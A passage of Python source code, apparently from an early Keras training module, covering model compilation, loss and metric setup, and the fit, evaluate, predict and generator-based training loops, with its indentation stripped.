optimizer: str (name of optimizer) or optimizer object.
See [optimizers](/optimizers).
loss: str (name of objective function) or objective function.
See [objectives](/objectives).
If the model has multiple outputs, you can use a different loss
on each output by passing a dictionary or a list of objectives.
metrics: list of metrics to be evaluated by the model
during training and testing.
Typically you will use `metrics=['accuracy']`.
To specify different metrics for different outputs of a
multi-output model, you could also pass a dictionary,
such as `metrics={'output_a': 'accuracy'}`.
sample_weight_mode: if you need to do timestep-wise
sample weighting (2D weights), set this to "temporal".
"None" defaults to sample-wise weights (1D).
If the model has multiple outputs, you can use a different
`sample_weight_mode` on each output by passing a
dictionary or a list of modes.
kwargs: when using the Theano backend, these arguments
are passed into K.function. Ignored for Tensorflow backend.
'''
self.optimizer = optimizers.get(optimizer)
self.sample_weight_mode = sample_weight_mode
self.loss = loss
self.loss_weights = loss_weights
# prepare loss weights
if loss_weights is None:
loss_weights_list = [1. for _ in range(len(self.outputs))]
elif type(loss_weights) is dict:
for name in loss_weights:
if name not in self.output_names:
raise Exception('Unknown entry in loss_weights '
'dictionary: "' + name + '". '
'Only expected the following keys: ' +
str(self.output_names))
loss_weights_list = []
for name in self.output_names:
loss_weights_list.append(loss_weights.get(name, 1.))
elif type(loss_weights) is list:
if len(loss_weights) != len(self.outputs):
raise Exception('When passing a list as loss_weights, '
'it should have one entry per model outputs. '
'The model has ' + str(len(self.outputs)) +
' outputs, but you passed loss_weights=' +
str(loss_weights))
loss_weights_list = loss_weights
else:
raise Exception('Could not interpret loss_weights argument: ' +
str(loss_weights))
# prepare loss functions
if type(loss) is dict:
for name in loss:
if name not in self.output_names:
raise Exception('Unknown entry in loss '
'dictionary: "' + name + '". '
'Only expected the following keys: ' +
str(self.output_names))
loss_functions = []
for name in self.output_names:
if name not in loss:
raise Exception('Output "' + name +
'" missing from loss dictionary')
loss_functions.append(objectives.get(loss[name]))
elif type(loss) is list:
if len(loss) != len(self.outputs):
raise Exception('When passing a list as loss, '
'it should have one entry per model outputs. '
'The model has ' + str(len(self.outputs)) +
' outputs, but you passed loss=' +
str(loss))
loss_functions = [objectives.get(l) for l in loss]
else:
loss_function = objectives.get(loss)
loss_functions = [loss_function for _ in range(len(self.outputs))]
self.loss_functions = loss_functions
weighted_losses = [weighted_objective(fn) for fn in loss_functions]
# prepare output masks
masks = self.compute_mask(self.inputs, mask=None)
if masks is None:
masks = [None for _ in self.outputs]
if type(masks) is not list:
masks = [masks]
# prepare sample weights
if type(sample_weight_mode) is dict:
for name in sample_weight_mode:
if name not in self.output_names:
raise Exception('Unknown entry in '
'sample_weight_mode dictionary: "' +
name + '". '
'Only expected the following keys: ' +
str(self.output_names))
sample_weights = []
sample_weight_modes = []
for name in self.output_names:
if name not in sample_weight_mode:
raise Exception('Output "' + name +
'" missing from sample_weight_modes '
'dictionary')
if sample_weight_mode.get(name) == 'temporal':
weight = K.placeholder(ndim=2, name=name + '_sample_weights')
sample_weight_modes.append('temporal')
else:
weight = K.placeholder(ndim=1, name=name + '_sample_weights')
sample_weight_modes.append(None)
sample_weights.append(weight)
elif type(sample_weight_mode) is list:
if len(sample_weight_mode) != len(self.outputs):
raise Exception('When passing a list as sample_weight_mode, ' +
'it should have one entry per model outputs. '
'The model has ' + str(len(self.outputs)) +
' outputs, but you passed sample_weight_mode=' +
str(sample_weight_mode))
sample_weights = []
sample_weight_modes = []
for mode, name in zip(sample_weight_mode, self.output_names):
if mode == 'temporal':
weight = K.placeholder(ndim=2, name=name + '_sample_weights')
sample_weight_modes.append('temporal')
else:
weight = K.placeholder(ndim=1, name=name + '_sample_weights')
sample_weight_modes.append(None)
sample_weights.append(weight)
else:
if sample_weight_mode == 'temporal':
sample_weights = [K.placeholder(ndim=2, name=name + '_sample_weights')
for name in self.output_names]
sample_weight_modes = ['temporal' for name in self.output_names]
else:
sample_weights = [K.placeholder(ndim=1, name=name + '_sample_weights')
for name in self.output_names]
sample_weight_modes = [None for name in self.output_names]
self.sample_weight_modes = sample_weight_modes
# prepare targets of model
self.targets = []
for i in range(len(self.outputs)):
shape = self.internal_output_shapes[i]
name = self.output_names[i]
self.targets.append(K.placeholder(ndim=len(shape), name=name + '_target'))
# prepare metrics
self.metrics = metrics
self.metrics_names = ['loss']
self.metrics_tensors = []
# compute total loss
total_loss = None
for i in range(len(self.outputs)):
y_true = self.targets[i]
y_pred = self.outputs[i]
weighted_loss = weighted_losses[i]
sample_weight = sample_weights[i]
mask = masks[i]
loss_weight = loss_weights_list[i]
output_loss = weighted_loss(y_true, y_pred,
sample_weight, mask)
if len(self.outputs) > 1:
self.metrics_tensors.append(output_loss)
self.metrics_names.append(self.output_names[i] + '_loss')
if total_loss is None:
total_loss = loss_weight * output_loss
else:
total_loss += loss_weight * output_loss
# add regularization penalties to the loss
for r in self.regularizers:
total_loss = r(total_loss)
# list of same size as output_names.
# contains tuples (metrics for output, names of metrics)
nested_metrics = collect_metrics(metrics, self.output_names)
def append_metric(layer_num, metric_name, metric_tensor):
"""Helper function, used in loop below"""
if len(self.output_names) > 1:
metric_name = self.output_layers[layer_num].name + '_' + metric_name
self.metrics_names.append(metric_name)
self.metrics_tensors.append(metric_tensor)
for i in range(len(self.outputs)):
y_true = self.targets[i]
y_pred = self.outputs[i]
output_metrics = nested_metrics[i]
for metric in output_metrics:
if metric == 'accuracy' or metric == 'acc':
# custom handling of accuracy (because of class mode duality)
output_shape = self.internal_output_shapes[i]
acc_fn = None
if output_shape[-1] == 1 or self.loss_functions[i] == objectives.binary_crossentropy:
# case: binary accuracy
acc_fn = metrics_module.binary_accuracy
elif self.loss_functions[i] == objectives.sparse_categorical_crossentropy:
# case: categorical accuracy with sparse targets
acc_fn = metrics_module.sparse_categorical_accuracy
else:
acc_fn = metrics_module.categorical_accuracy
append_metric(i, 'acc', acc_fn(y_true, y_pred))
else:
metric_fn = metrics_module.get(metric)
metric_result = metric_fn(y_true, y_pred)
if not isinstance(metric_result, dict):
metric_result = {
metric_fn.__name__: metric_result
}
for name, tensor in six.iteritems(metric_result):
append_metric(i, name, tensor)
# prepare gradient updates and state updates
self.optimizer = optimizers.get(optimizer)
self.total_loss = total_loss
self.sample_weights = sample_weights
# functions for train, test and predict will
# be compiled lazily when required.
# This saves time when the user is not using all functions.
self._function_kwargs = kwargs
self.train_function = None
self.test_function = None
self.predict_function = None
self._collected_trainable_weights = collect_trainable_weights(self)
def _make_train_function(self):
if not hasattr(self, 'train_function'):
raise Exception('You must compile your model before using it.')
if self.train_function is None:
if self.uses_learning_phase and type(K.learning_phase()) is not int:
inputs = self.inputs + self.targets + self.sample_weights + [K.learning_phase()]
else:
inputs = self.inputs + self.targets + self.sample_weights
training_updates = self.optimizer.get_updates(self._collected_trainable_weights,
self.constraints,
self.total_loss)
updates = self.updates + training_updates
# returns loss and metrics. Updates weights at each call.
self.train_function = K.function(inputs,
[self.total_loss] + self.metrics_tensors,
updates=updates,
**self._function_kwargs)
def _make_test_function(self):
if not hasattr(self, 'test_function'):
raise Exception('You must compile your model before using it.')
if self.test_function is None:
if self.uses_learning_phase and type(K.learning_phase()) is not int:
inputs = self.inputs + self.targets + self.sample_weights + [K.learning_phase()]
else:
inputs = self.inputs + self.targets + self.sample_weights
# return loss and metrics, no gradient updates.
# Does update the network states.
self.test_function = K.function(inputs,
[self.total_loss] + self.metrics_tensors,
updates=self.state_updates,
**self._function_kwargs)
def _make_predict_function(self):
if not hasattr(self, 'predict_function'):
self.predict_function = None
if self.predict_function is None:
if self.uses_learning_phase and type(K.learning_phase()) is not int:
inputs = self.inputs + [K.learning_phase()]
else:
inputs = self.inputs
# returns network outputs. Does not update weights.
# Does update the network states.
kwargs = getattr(self, '_function_kwargs', {})
self.predict_function = K.function(inputs,
self.outputs,
updates=self.state_updates,
**kwargs)
def _fit_loop(self, f, ins, out_labels=[], batch_size=32,
nb_epoch=100, verbose=1, callbacks=[],
val_f=None, val_ins=None, shuffle=True,
callback_metrics=[]):
'''Abstract fit function for f(ins).
Assume that f returns a list, labeled by out_labels.
# Arguments
f: Keras function returning a list of tensors
ins: list of tensors to be fed to `f`
out_labels: list of strings, display names of
the outputs of `f`
batch_size: integer batch size
nb_epoch: number of times to iterate over the data
verbose: verbosity mode, 0, 1 or 2
callbacks: list of callbacks to be called during training
val_f: Keras function to call for validation
val_ins: list of tensors to be fed to `val_f`
shuffle: whether to shuffle the data at the beginning of each epoch
callback_metrics: list of strings, the display names of the metrics
passed to the callbacks. They should be the
concatenation of list the display names of the outputs of
`f` and the list of display names of the outputs of `f_val`.
# Returns
`History` object.
'''
do_validation = False
if val_f and val_ins:
do_validation = True
if verbose:
print('Train on %d samples, validate on %d samples' %
(ins[0].shape[0], val_ins[0].shape[0]))
nb_train_sample = ins[0].shape[0]
index_array = np.arange(nb_train_sample)
self.history = cbks.History()
callbacks = [cbks.BaseLogger()] + callbacks + [self.history]
if verbose:
callbacks += [cbks.ProgbarLogger()]
callbacks = cbks.CallbackList(callbacks)
# it's possible to callback a different model than self
# (used by Sequential models)
if hasattr(self, 'callback_model') and self.callback_model:
callback_model = self.callback_model
else:
callback_model = self
callbacks._set_model(callback_model)
callbacks._set_params({
'batch_size': batch_size,
'nb_epoch': nb_epoch,
'nb_sample': nb_train_sample,
'verbose': verbose,
'do_validation': do_validation,
'metrics': callback_metrics,
})
callbacks.on_train_begin()
callback_model.stop_training = False
self.validation_data = val_ins
for epoch in range(nb_epoch):
callbacks.on_epoch_begin(epoch)
if shuffle == 'batch':
index_array = batch_shuffle(index_array, batch_size)
elif shuffle:
np.random.shuffle(index_array)
batches = make_batches(nb_train_sample, batch_size)
epoch_logs = {}
for batch_index, (batch_start, batch_end) in enumerate(batches):
batch_ids = index_array[batch_start:batch_end]
try:
if type(ins[-1]) is float:
# do not slice the training phase flag
ins_batch = slice_X(ins[:-1], batch_ids) + [ins[-1]]
else:
ins_batch = slice_X(ins, batch_ids)
except TypeError:
raise Exception('TypeError while preparing batch. '
'If using HDF5 input data, '
'pass shuffle="batch".')
batch_logs = {}
batch_logs['batch'] = batch_index
batch_logs['size'] = len(batch_ids)
callbacks.on_batch_begin(batch_index, batch_logs)
outs = f(ins_batch)
if type(outs) != list:
outs = [outs]
for l, o in zip(out_labels, outs):
batch_logs[l] = o
callbacks.on_batch_end(batch_index, batch_logs)
if batch_index == len(batches) - 1: # last batch
# validation
if do_validation:
# replace with self._evaluate
val_outs = self._test_loop(val_f, val_ins,
batch_size=batch_size,
verbose=0)
if type(val_outs) != list:
val_outs = [val_outs]
# same labels assumed
for l, o in zip(out_labels, val_outs):
epoch_logs['val_' + l] = o
callbacks.on_epoch_end(epoch, epoch_logs)
if callback_model.stop_training:
break
callbacks.on_train_end()
return self.history
def _predict_loop(self, f, ins, batch_size=32, verbose=0):
'''Abstract method to loop over some data in batches.
# Arguments
f: Keras function returning a list of tensors.
ins: list of tensors to be fed to `f`.
batch_size: integer batch size.
verbose: verbosity mode.
# Returns
Array of predictions (if the model has a single output)
or list of arrays of predictions
(if the model has multiple outputs).
'''
nb_sample = ins[0].shape[0]
outs = []
if verbose == 1:
progbar = Progbar(target=nb_sample)
batches = make_batches(nb_sample, batch_size)
index_array = np.arange(nb_sample)
for batch_index, (batch_start, batch_end) in enumerate(batches):
batch_ids = index_array[batch_start:batch_end]
if type(ins[-1]) is float:
# do not slice the training phase flag
ins_batch = slice_X(ins[:-1], batch_ids) + [ins[-1]]
else:
ins_batch = slice_X(ins, batch_ids)
batch_outs = f(ins_batch)
if type(batch_outs) != list:
batch_outs = [batch_outs]
if batch_index == 0:
for batch_out in batch_outs:
shape = (nb_sample,) + batch_out.shape[1:]
outs.append(np.zeros(shape, dtype=K.floatx()))
for i, batch_out in enumerate(batch_outs):
outs[i][batch_start:batch_end] = batch_out
if verbose == 1:
progbar.update(batch_end)
if len(outs) == 1:
return outs[0]
return outs
def _test_loop(self, f, ins, batch_size=32, verbose=0):
'''Abstract method to loop over some data in batches.
# Arguments
f: Keras function returning a list of tensors.
ins: list of tensors to be fed to `f`.
batch_size: integer batch size.
verbose: verbosity mode.
# Returns
Scalar loss (if the model has a single output and no metrics)
or list of scalars (if the model has multiple outputs
and/or metrics). The attribute `model.metrics_names` will give you
the display labels for the scalar outputs.
'''
nb_sample = ins[0].shape[0]
outs = []
if verbose == 1:
progbar = Progbar(target=nb_sample)
batches = make_batches(nb_sample, batch_size)
index_array = np.arange(nb_sample)
for batch_index, (batch_start, batch_end) in enumerate(batches):
batch_ids = index_array[batch_start:batch_end]
if type(ins[-1]) is float:
# do not slice the training phase flag
ins_batch = slice_X(ins[:-1], batch_ids) + [ins[-1]]
else:
ins_batch = slice_X(ins, batch_ids)
batch_outs = f(ins_batch)
if type(batch_outs) == list:
if batch_index == 0:
for batch_out in enumerate(batch_outs):
outs.append(0.)
for i, batch_out in enumerate(batch_outs):
outs[i] += batch_out * len(batch_ids)
else:
if batch_index == 0:
outs.append(0.)
outs[0] += batch_outs * len(batch_ids)
if verbose == 1:
progbar.update(batch_end)
for i, out in enumerate(outs):
outs[i] /= nb_sample
if len(outs) == 1:
return outs[0]
return outs
def _standardize_user_data(self, x, y,
sample_weight=None, class_weight=None,
check_batch_dim=True, batch_size=None):
if not hasattr(self, 'optimizer'):
raise Exception('You must compile a model before training/testing.'
' Use `model.compile(optimizer, loss)`.')
output_shapes = []
for output_shape, loss_fn in zip(self.internal_output_shapes, self.loss_functions):
if loss_fn.__name__ == 'sparse_categorical_crossentropy':
output_shapes.append(output_shape[:-1] + (1,))
elif getattr(objectives, loss_fn.__name__, None) is None:
output_shapes.append(None)
else:
output_shapes.append(output_shape)
x = standardize_input_data(x, self.input_names,
self.internal_input_shapes,
check_batch_dim=False,
exception_prefix='model input')
y = standardize_input_data(y, self.output_names,
output_shapes,
check_batch_dim=False,
exception_prefix='model target')
sample_weights = standardize_sample_weights(sample_weight,
self.output_names)
class_weights = standardize_class_weights(class_weight,
self.output_names)
sample_weights = [standardize_weights(ref, sw, cw, mode)
for (ref, sw, cw, mode)
in zip(y, sample_weights, class_weights, self.sample_weight_modes)]
check_array_lengths(x, y, sample_weights)
check_loss_and_target_compatibility(y, self.loss_functions, self.internal_output_shapes)
if self.stateful and batch_size:
if x[0].shape[0] % batch_size != 0:
raise Exception('In a stateful network, '
'you should only pass inputs with '
'a number of samples that can be '
'divided by the batch size. Found: ' +
str(x[0].shape[0]) + ' samples')
return x, y, sample_weights
def fit(self, x, y, batch_size=32, nb_epoch=10, verbose=1, callbacks=[],
validation_split=0., validation_data=None, shuffle=True,
class_weight=None, sample_weight=None):
'''Trains the model for a fixed number of epochs (iterations on a dataset).
# Arguments
x: Numpy array of training data,
or list of Numpy arrays if the model has multiple inputs.
If all inputs in the model are named, you can also pass a dictionary
mapping input names to Numpy arrays.
y: Numpy array of target data,
or list of Numpy arrays if the model has multiple outputs.
If all outputs in the model are named, you can also pass a dictionary
mapping output names to Numpy arrays.
batch_size: integer. Number of samples per gradient update.
nb_epoch: integer, the number of times to iterate over the training data arrays.
verbose: 0, 1, or 2. Verbosity mode. 0 = silent, 1 = verbose, 2 = one log line per epoch.
callbacks: list of callbacks to be called during training.
See [callbacks](/callbacks).
validation_split: float between 0 and 1:
fraction of the training data to be used as validation data.
The model will set apart this fraction of the training data,
will not train on it, and will evaluate the loss and any model metrics
on this data at the end of each epoch.
validation_data: data on which to evaluate the loss and any model metrics
at the end of each epoch. The model will not be trained on this data.
This could be a tuple (x_val, y_val) or a tuple (val_x, val_y, val_sample_weights).
shuffle: boolean, whether to shuffle the training data before each epoch.
class_weight: optional dictionary mapping class indices (integers) to
a weight (float) to apply to the model's loss for the samples
from this class during training.
This can be useful to tell the model to "pay more attention" to
samples from an under-represented class.
sample_weight: optional array of the same length as x, containing
weights to apply to the model's loss for each sample.
In the case of temporal data, you can pass a 2D array
with shape (samples, sequence_length),
to apply a different weight to every timestep of every sample.
In this case you should make sure to specify sample_weight_mode="temporal" in compile().
# Returns
A `History` instance. Its `history` attribute contains
all information collected during training.
'''
# validate user data
x, y, sample_weights = self._standardize_user_data(x, y,
sample_weight=sample_weight,
class_weight=class_weight,
check_batch_dim=False,
batch_size=batch_size)
# prepare validation data
if validation_data:
do_validation = True
if len(validation_data) == 2:
val_x, val_y = validation_data
val_sample_weight = None
elif len(validation_data) == 3:
val_x, val_y, val_sample_weight = validation_data
else:
raise
val_x, val_y, val_sample_weights = self._standardize_user_data(val_x, val_y,
sample_weight=val_sample_weight,
check_batch_dim=False,
batch_size=batch_size)
self._make_test_function()
val_f = self.test_function
if self.uses_learning_phase and type(K.learning_phase()) is not int:
val_ins = val_x + val_y + val_sample_weights + [0.]
else:
val_ins = val_x + val_y + val_sample_weights
elif validation_split and 0. < validation_split < 1.:
do_validation = True
split_at = int(len(x[0]) * (1. - validation_split))
x, val_x = (slice_X(x, 0, split_at), slice_X(x, split_at))
y, val_y = (slice_X(y, 0, split_at), slice_X(y, split_at))
sample_weights, val_sample_weights = (
slice_X(sample_weights, 0, split_at), slice_X(sample_weights, split_at))
self._make_test_function()
val_f = self.test_function
if self.uses_learning_phase and type(K.learning_phase()) is not int:
val_ins = val_x + val_y + val_sample_weights + [0.]
else:
val_ins = val_x + val_y + val_sample_weights
else:
do_validation = False
val_f = None
val_ins = None
# prepare input arrays and training function
if self.uses_learning_phase and type(K.learning_phase()) is not int:
ins = x + y + sample_weights + [1.]
else:
ins = x + y + sample_weights
self._make_train_function()
f = self.train_function
# prepare display labels
out_labels = self.metrics_names
# rename duplicated metrics name
# (can happen with an output layer shared among multiple dataflows)
deduped_out_labels = []
for i, label in enumerate(out_labels):
new_label = label
if out_labels.count(label) > 1:
dup_idx = out_labels[:i].count(label)
new_label += '_' + str(dup_idx + 1)
deduped_out_labels.append(new_label)
out_labels = deduped_out_labels
if do_validation:
callback_metrics = copy.copy(out_labels) + ['val_' + n for n in out_labels]
else:
callback_metrics = copy.copy(out_labels)
# delegate logic to _fit_loop
return self._fit_loop(f, ins, out_labels=out_labels,
batch_size=batch_size, nb_epoch=nb_epoch,
verbose=verbose, callbacks=callbacks,
val_f=val_f, val_ins=val_ins, shuffle=shuffle,
callback_metrics=callback_metrics)
def evaluate(self, x, y, batch_size=32, verbose=1, sample_weight=None):
'''Returns the loss value and metrics values for the model
in test mode. Computation is done in batches.
# Arguments
x: Numpy array of test data,
or list of Numpy arrays if the model has multiple inputs.
If all inputs in the model are named, you can also pass a dictionary
mapping input names to Numpy arrays.
y: Numpy array of target data,
or list of Numpy arrays if the model has multiple outputs.
If all outputs in the model are named, you can also pass a dictionary
mapping output names to Numpy arrays.
batch_size: integer. Number of samples per gradient update.
# Returns
Scalar test loss (if the model has a single output and no metrics)
or list of scalars (if the model has multiple outputs
and/or metrics). The attribute `model.metrics_names` will give you
the display labels for the scalar outputs.
'''
# validate user data
x, y, sample_weights = self._standardize_user_data(x, y,
sample_weight=sample_weight,
check_batch_dim=False,
batch_size=batch_size)
# prepare inputs, delegate logic to _test_loop
if self.uses_learning_phase and type(K.learning_phase()) is not int:
ins = x + y + sample_weights + [0.]
else:
ins = x + y + sample_weights
self._make_test_function()
f = self.test_function
return self._test_loop(f, ins,
batch_size=batch_size,
verbose=verbose)
def predict(self, x, batch_size=32, verbose=0):
'''Generates output predictions for the input samples,
processing the samples in a batched way.
# Arguments
x: the input data, as a Numpy array
(or list of Numpy arrays if the model has multiple outputs).
batch_size: integer.
verbose: verbosity mode, 0 or 1.
# Returns
A Numpy array of predictions.
'''
# validate user data
x = standardize_input_data(x, self.input_names,
self.internal_input_shapes,
check_batch_dim=False)
if self.stateful:
if x[0].shape[0] > batch_size and x[0].shape[0] % batch_size != 0:
raise Exception('In a stateful network, '
'you should only pass inputs with '
'a number of samples that can be '
'divided by the batch size. Found: ' +
str(x[0].shape[0]) + ' samples. '
'Batch size: ' + str(batch_size) + '.')
# prepare inputs, delegate logic to _predict_loop
if self.uses_learning_phase and type(K.learning_phase()) is not int:
ins = x + [0.]
else:
ins = x
self._make_predict_function()
f = self.predict_function
return self._predict_loop(f, ins,
batch_size=batch_size, verbose=verbose)
def train_on_batch(self, x, y,
sample_weight=None, class_weight=None):
'''Runs a single gradient update on a single batch of data.
# Arguments
x: Numpy array of training data,
or list of Numpy arrays if the model has multiple inputs.
If all inputs in the model are named, you can also pass a dictionary
mapping input names to Numpy arrays.
y: Numpy array of target data,
or list of Numpy arrays if the model has multiple outputs.
If all outputs in the model are named, you can also pass a dictionary
mapping output names to Numpy arrays.
sample_weight: optional array of the same length as x, containing
weights to apply to the model's loss for each sample.
In the case of temporal data, you can pass a 2D array
with shape (samples, sequence_length),
to apply a different weight to every timestep of every sample.
In this case you should make sure to specify sample_weight_mode="temporal" in compile().
class_weight: optional dictionary mapping class indices (integers) to
a weight (float) to apply to the model's loss for the samples
from this class during training.
This can be useful to tell the model to "pay more attention" to
samples from an under-represented class.
# Returns
Scalar training loss (if the model has a single output and no metrics)
or list of scalars (if the model has multiple outputs
and/or metrics). The attribute `model.metrics_names` will give you
the display labels for the scalar outputs.
'''
x, y, sample_weights = self._standardize_user_data(x, y,
sample_weight=sample_weight,
class_weight=class_weight,
check_batch_dim=True)
if self.uses_learning_phase and type(K.learning_phase()) is not int:
ins = x + y + sample_weights + [1.]
else:
ins = x + y + sample_weights
self._make_train_function()
outputs = self.train_function(ins)
if len(outputs) == 1:
return outputs[0]
return outputs
def test_on_batch(self, x, y, sample_weight=None):
'''Test the model on a single batch of samples.
# Arguments
x: Numpy array of test data,
or list of Numpy arrays if the model has multiple inputs.
If all inputs in the model are named, you can also pass a dictionary
mapping input names to Numpy arrays.
y: Numpy array of target data,
or list of Numpy arrays if the model has multiple outputs.
If all outputs in the model are named, you can also pass a dictionary
mapping output names to Numpy arrays.
sample_weight: optional array of the same length as x, containing
weights to apply to the model's loss for each sample.
In the case of temporal data, you can pass a 2D array
with shape (samples, sequence_length),
to apply a different weight to every timestep of every sample.
In this case you should make sure to specify sample_weight_mode="temporal" in compile().
# Returns
Scalar test loss (if the model has a single output and no metrics)
or list of scalars (if the model has multiple outputs
and/or metrics). The attribute `model.metrics_names` will give you
the display labels for the scalar outputs.
'''
x, y, sample_weights = self._standardize_user_data(x, y,
sample_weight=sample_weight,
check_batch_dim=True)
if self.uses_learning_phase and type(K.learning_phase()) is not int:
ins = x + y + sample_weights + [0.]
else:
ins = x + y + sample_weights
self._make_test_function()
outputs = self.test_function(ins)
if len(outputs) == 1:
return outputs[0]
return outputs
def predict_on_batch(self, x):
'''Returns predictions for a single batch of samples.
'''
x = standardize_input_data(x, self.input_names,
self.internal_input_shapes)
if self.uses_learning_phase and type(K.learning_phase()) is not int:
ins = x + [0.]
else:
ins = x
self._make_predict_function()
outputs = self.predict_function(ins)
if len(outputs) == 1:
return outputs[0]
return outputs
def fit_generator(self, generator, samples_per_epoch, nb_epoch,
verbose=1, callbacks=[],
validation_data=None, nb_val_samples=None,
class_weight={}, max_q_size=10, nb_worker=1, pickle_safe=False):
'''Fits the model on data generated batch-by-batch by
a Python generator.
The generator is run in parallel to the model, for efficiency.
For instance, this allows you to do real-time data augmentation
on images on CPU in parallel to training your model on GPU.
# Arguments
generator: a generator.
The output of the generator must be either
- a tuple (inputs, targets)
- a tuple (inputs, targets, sample_weights).
All arrays should contain the same number of samples.
The generator is expected to loop over its data
indefinitely. An epoch finishes when `samples_per_epoch`
samples have been seen by the model.
samples_per_epoch: integer, number of samples to process before
going to the next epoch.
nb_epoch: integer, total number of iterations on the data.
verbose: verbosity mode, 0, 1, or 2.
callbacks: list of callbacks to be called during training.
validation_data: this can be either
- a generator for the validation data
- a tuple (inputs, targets)
- a tuple (inputs, targets, sample_weights).
nb_val_samples: only relevant if `validation_data` is a generator.
number of samples to use from validation generator
at the end of every epoch.
class_weight: dictionary mapping class indices to a weight
for the class.
max_q_size: maximum size for the generator queue
nb_worker: maximum number of processes to spin up when using process based threading
pickle_safe: if True, use process based threading. Note that because
this implementation relies on multiprocessing, you should not pass
non picklable arguments to the generator as they can't be passed
easily to children processes.
# Returns
A `History` object.
# Example
```python
def generate_arrays_from_file(path):
while 1:
f = open(path)
for line in f:
# create numpy arrays of input data
# and labels, from each line in the file
x1, x2, y = process_line(line)
yield ({'input_1': x1, 'input_2': x2}, {'output': y})
f.close()
model.fit_generator(generate_arrays_from_file('/my_file.txt'),
samples_per_epoch=10000, nb_epoch=10)
```
'''
wait_time = 0.01 # in seconds
epoch = 0
do_validation = bool(validation_data)
self._make_train_function()
if do_validation:
self._make_test_function()
# python 2 has 'next', 3 has '__next__'
# avoid any explicit version checks
val_gen = (hasattr(validation_data, 'next') or
hasattr(validation_data, '__next__'))
if val_gen and not nb_val_samples:
raise Exception('When using a generator for validation data, '
'you must specify a value for "nb_val_samples".')
out_labels = self.metrics_names
callback_metrics = out_labels + ['val_' + n for n in out_labels]
# prepare callbacks
self.history = cbks.History()
callbacks = [cbks.BaseLogger()] + callbacks + [self.history]
if verbose:
callbacks += [cbks.ProgbarLogger()]
callbacks = cbks.CallbackList(callbacks)
# it's possible to callback a different model than self:
if hasattr(self, 'callback_model') and self.callback_model:
callback_model = self.callback_model
else:
callback_model = self
callbacks._set_model(callback_model)
callbacks._set_params({
'nb_epoch': nb_epoch,
'nb_sample': samples_per_epoch,
'verbose': verbose,
'do_validation': do_validation,
'metrics': callback_metrics,
})
callbacks.on_train_begin()
if do_validation and not val_gen:
if len(validation_data) == 2:
val_x, val_y = validation_data
val_sample_weight = None
elif len(validation_data) == 3:
val_x, val_y, val_sample_weight = validation_data
else:
raise Exception('validation_data should be a tuple '
'(val_x, val_y, val_sample_weight) '
'or (val_x, val_y). Found: ' + str(validation_data))
val_x, val_y, val_sample_weights = self._standardize_user_data(val_x, val_y, val_sample_weight)
self.validation_data = val_x + [val_y, val_sample_weights]
else:
self.validation_data = None
# start generator thread storing batches into a queue
data_gen_queue, _stop, generator_threads = generator_queue(generator, max_q_size=max_q_size, nb_worker=nb_worker,
pickle_safe=pickle_safe)
callback_model.stop_training = False
while epoch < nb_epoch:
callbacks.on_epoch_begin(epoch)
samples_seen = 0
batch_index = 0
while samples_seen < samples_per_epoch:
generator_output = None
while not _stop.is_set():
if not data_gen_queue.empty():
generator_output = data_gen_queue.get()
break
else:
time.sleep(wait_time)
if not hasattr(generator_output, '__len__'):
_stop.set()
raise Exception('output of generator should be a tuple '
'(x, y, sample_weight) '
'or (x, y). Found: ' + str(generator_output))
if len(generator_output) == 2:
x, y = generator_output
sample_weight = None
elif len(generator_output) == 3:
x, y, sample_weight = generator_output
else:
_stop.set()
raise Exception('output of generator should be a tuple '
'(x, y, sample_weight) '
'or (x, y). Found: ' + str(generator_output))
# build batch logs
batch_logs = {}
if type(x) is list:
batch_size = x[0].shape[0]
elif type(x) is dict:
batch_size = list(x.values())[0].shape[0]
else:
batch_size = x.shape[0]
batch_logs['batch'] = batch_index
batch_logs['size'] = batch_size
callbacks.on_batch_begin(batch_index, batch_logs)
try:
outs = self.train_on_batch(x, y,
sample_weight=sample_weight,
class_weight=class_weight)
except:
_stop.set()
raise
if type(outs) != list:
outs = [outs]
for l, o in zip(out_labels, outs):
batch_logs[l] = o
callbacks.on_batch_end(batch_index, batch_logs)
# construct epoch logs
epoch_logs = {}
batch_index += 1
samples_seen += batch_size
# epoch finished
if samples_seen > samples_per_epoch:
warnings.warn('Epoch comprised more than '
'`samples_per_epoch` samples, '
'which might affect learning results. '
'Set `samples_per_epoch` correctly '
'to avoid this warning.')
if samples_seen >= samples_per_epoch and do_validation:
if val_gen:
val_outs = self.evaluate_generator(validation_data,
nb_val_samples,
max_q_size=max_q_size,
nb_worker=nb_worker,
pickle_safe=pickle_safe)
else:
# no need for try/except because
# data has already been validated
val_outs = self.evaluate(val_x, val_y,
batch_size=batch_size,
sample_weight=val_sample_weights,
verbose=0)
if type(val_outs) is not list:
val_outs = [val_outs]
# same labels assumed
for l, o in zip(out_labels, val_outs):
epoch_logs['val_' + l] = o
callbacks.on_epoch_end(epoch, epoch_logs)
epoch += 1
if callback_model.stop_training:
break
_stop.set()
if pickle_safe:
# Terminate all daemon processes
for p in generator_threads:
if p.is_alive():
p.terminate()
data_gen_queue.close()
callbacks.on_train_end()
return self.history
def evaluate_generator(self, generator, val_samples, max_q_size=10, nb_worker=1, pickle_safe=False):
'''Evaluates the model on a data generator. The generator should
return the same kind of data as accepted by `test_on_batch`.
Arguments:
generator:
generator yielding tuples (inputs, targets)
or (inputs, targets, sample_weights)
val_samples:
total number of samples to generate from `generator`
before returning.
max_q_size: maximum size for the generator queue
nb_worker: maximum number of processes to spin up when using process based threading
pickle_safe: if True, use process based threading. Note that because
this implementation relies on multiprocessing, you should not pass
non picklable arguments to the generator as they can't be passed
easily to children processes.
# Returns
Scalar test loss (if the model has a single output and no metrics)
or list of scalars (if the model has multiple outputs
and/or metrics). The attribute `model.metrics_names` will give you
the display labels for the scalar outputs.
'''
self._make_test_function()
processed_samples = 0
wait_time = 0.01
all_outs = []
weights = []
data_gen_queue, _stop, generator_threads = generator_queue(generator, max_q_size=max_q_size, nb_worker=nb_worker,
pickle_safe=pickle_safe)
while processed_samples < val_samples:
generator_output = None
while not _stop.is_set():
if not data_gen_queue.empty():
generator_output = data_gen_queue.get()
break
else:
time.sleep(wait_time)
if not hasattr(generator_output, '__len__'):
_stop.set()
raise Exception('output of generator should be a tuple '
'(x, y, sample_weight) '
'or (x, y). Found: ' + str(generator_output))
if len(generator_output) == 2:
x, y = generator_output
sample_weight = None
elif len(generator_output) == 3:
x, y, sample_weight = generator_output
else:
_stop.set()
raise Exception('output of generator should be a tuple '
'(x, y, sample_weight) '
'or (x, y). Found: ' + str(generator_output))
try:
outs = self.test_on_batch(x, y, sample_weight=sample_weight)
except:
_stop.set()
raise
if type(x) is list:
